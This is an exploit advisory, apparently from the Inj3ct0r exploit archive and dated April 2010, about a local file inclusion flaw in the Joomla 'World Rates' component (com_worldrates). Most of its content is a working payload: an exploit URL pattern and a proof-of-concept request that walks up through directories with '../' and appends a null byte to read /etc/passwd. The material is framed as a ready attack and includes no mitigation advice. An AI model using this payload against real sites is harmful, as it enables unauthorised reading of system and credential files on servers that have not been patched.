Joomla com_worldrates Local File Inclusion Vulnerability

Posted on 12 April 2010
========================================================
Joomla com_worldrates Local File Inclusion Vulnerability
========================================================

================================================================================================================
 
 
  [o] Joomla Component World Rates Local File Inclusion Vulnerability
  
       Software : com_worldrates
       Vendor   : http://dev.pucit.edu.pk/
       Download : http://dev.pucit.edu.pk/files/worldrates.zip
       Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
================================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_worldrates&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
 
 
================================================================================================================


# Inj3ct0r.com [2010-04-12]
TOP
Malware :

Last 20
Exploits :

Last 20